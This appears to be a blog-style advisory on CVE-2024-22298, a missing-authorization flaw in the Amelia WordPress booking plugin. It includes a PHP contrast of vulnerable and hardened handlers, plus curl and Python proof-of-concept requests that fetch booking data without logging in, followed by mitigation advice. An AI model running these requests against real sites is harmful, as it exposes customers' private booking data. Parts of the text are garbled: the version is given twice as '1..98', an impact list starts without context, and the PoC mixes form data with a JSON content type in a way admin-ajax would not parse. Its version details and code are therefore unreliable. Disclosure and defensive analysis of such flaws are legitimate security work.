In June 2024, CVE-2024-22298 was assigned to a critical security flaw in the widely used TMS Amelia WordPress plugin (also known as ameliabooking). The vulnerability is present in all versions of Amelia up to and including 1..98. If left unpatched, it exposes your website and its booking data to unauthorized access, potentially letting attackers perform actions they shouldn’t. In this post, we explain what the vulnerability is, provide exploit details, show proof-of-concept code, and link the original references for further reading.
🔥 What is TMS Amelia and Why is This Important?
TMS Amelia is a popular WordPress plugin for appointment and event booking. Businesses (from salons to gyms) rely on it to manage reservations, registrations, and customer data. Because it directly handles customer details and bookings, vulnerabilities can lead to serious privacy breaches or even site takeovers.
📢 The Vulnerability: Missing Authorization Check
CVE-2024-22298 is a *Missing Authorization* vulnerability. In simple terms: the plugin fails to properly check whether a user is logged in, or if they have permission to perform certain actions. This means an attacker could send crafted requests to the website and access or modify information without logging in or having the right role.
Let’s break it down
1. Normal Behavior: Actions (like managing appointments or viewing customer info) should be protected—only admins or registered users can do them.
2. Vulnerable Endpoint: The plugin exposes an endpoint (like /wp-admin/admin-ajax.php with the action=amelia_api POST parameter) that doesn’t verify if the request comes from a logged-in user.
3. Attacker’s Move: An attacker sends a direct HTTP request with crafted data, bypassing any login or access controls.
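To make the missing check concrete, here is an added illustration (not Amelia’s source code) of a WordPress admin-ajax handler written in the vulnerable pattern, next to a hardened version; the hook name `example_api`, the `params` field, the nonce action and the `manage_options` capability are assumed for the example.

```php
<?php
// Added illustration of the "missing authorization" pattern in a WordPress
// admin-ajax handler. Hook names, the nonce action and the capability are
// assumed for this example; this is not Amelia's code.

// VULNERABLE PATTERN: the callback is also registered on the nopriv hook, so
// anonymous visitors reach it, and it never checks who is asking or what they
// are allowed to do before returning data.
add_action('wp_ajax_example_api',        'example_api_vulnerable');
add_action('wp_ajax_nopriv_example_api', 'example_api_vulnerable');

function example_api_vulnerable() {
    $params = json_decode(wp_unslash($_POST['params'] ?? ''), true);
    if (is_array($params) && ($params['endpoint'] ?? '') === 'bookings') {
        // Every booking is returned to anyone who can reach admin-ajax.php.
        wp_send_json_success(example_get_all_bookings());
    }
    wp_send_json_error('unknown endpoint', 400);
}

// HARDENED PATTERN: no nopriv hook for privileged data, a nonce check against
// CSRF, and an explicit capability check before any data is touched.
add_action('wp_ajax_example_api', 'example_api_hardened');

function example_api_hardened() {
    // Dies with HTTP 403 when the 'nonce' field is missing or invalid.
    check_ajax_referer('example_api_nonce', 'nonce');

    // Logged-in users without the required capability are refused as well.
    if (!current_user_can('manage_options')) {   // capability assumed
        wp_send_json_error('forbidden', 403);
    }

    $params = json_decode(wp_unslash($_POST['params'] ?? ''), true);
    if (!is_array($params) || ($params['endpoint'] ?? '') !== 'bookings') {
        wp_send_json_error('unknown endpoint', 400);
    }
    wp_send_json_success(example_get_all_bookings());
}

function example_get_all_bookings() {
    return [];   // placeholder data source for the example
}
```

Note that `wp_send_json_error()` ends the request, so the hardened handler never falls through to the data query when a check fails.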
Example Exploit Code (Proof of Concept)
Here’s a simple curl command that could be used by an attacker to fetch sensitive info from an unpatched Amelia plugin installation:
```bash
# Unauthenticated POST to the WordPress AJAX endpoint; no cookie or nonce is sent
curl -X POST https://victimsite.com/wp-admin/admin-ajax.php \
  -d 'action=amelia_api' \
  -d '{"apiCall":"GET","endpoint":"bookings"}' \
  -H "Content-Type: application/json"
```
What’s happening above?
- The attacker sends a POST request to the admin-ajax.php endpoint, calling the vulnerable Amelia API. No authentication cookies or tokens are needed!
- The request could return sensitive booking data or even allow adding/deleting entries.
For those who prefer Python
```python
import requests

# Same request as the curl example: the vulnerable admin-ajax action
url = 'https://victimsite.com/wp-admin/admin-ajax.php'
data = {
    'action': 'amelia_api',
    'params': '{"apiCall":"GET","endpoint":"bookings"}'
}
headers = {'Content-Type': 'application/json'}

# No session cookie or nonce is attached to the request
r = requests.post(url, json=data, headers=headers)
print(r.text)
```
- Manipulation of bookings: Creating, editing, or deleting appointments without proper access.
- Website compromise: In some cases, attackers might exploit this as a stepping stone for further attacks.
🛡️ Mitigation Steps
1. Update Immediately – Get the latest version of Amelia. Ensure you are running a version above 1..98, where the issue is patched.
2. Restrict API access: Use a firewall like Wordfence or Cloudflare to limit access to /wp-admin/admin-ajax.php. Filter or rate-limit rather than block it outright, since many themes and plugins use admin-ajax.php for legitimate front-end requests.
3. Monitor for suspicious requests: Check your server logs for repeated use of the amelia_api action from unusual sources.
🔗 References
- Official CVE Record
- WPScan Entry *(if available)*
- Amelia Plugin Home
- WordPress Plugin Repository
📝 Final Words
CVE-2024-22298 shows that authorization checks are crucial, especially for plugins that manage sensitive data. If you’re using Amelia, update as soon as possible and educate your clients about the risks of using outdated plugins. Security is a moving target; stay vigilant!
*If you found this post helpful, share it with others in the WordPress community. Together, we can make the web safer!*
Timeline
Published on: 06/10/2024 08:15:48 UTC
Last modified on: 06/10/2024 12:40:41 UTC